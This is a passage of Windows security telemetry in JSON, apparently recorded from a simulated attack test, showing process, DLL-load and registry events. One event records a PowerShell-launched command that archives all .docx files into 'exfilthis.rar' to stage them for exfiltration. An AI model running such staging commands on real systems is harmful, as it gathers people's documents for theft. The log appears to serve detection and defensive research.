"{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573444330000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573444330000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573444330000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "process", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573444330000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883573445259984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883573445259984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"rar a -r exfilthis.rar *.docx\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 8008, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573450980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573450890000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573450890000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573450890000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573450890000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573450890000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, - { - "event_type": "process", - "pid": 8008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4696, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573451150000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573451040000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "process", - "pid": 4696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573451200016, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", - "registry_value": "CIMOM", - "timestamp": 131883573453700016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573454020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WmiPerfClass.dll", - "image_path": "C:\\Windows\\System32\\wbem\\WmiPerfClass.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wevtapi.dll", - "image_path": "C:\\Windows\\System32\\wevtapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573454170000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 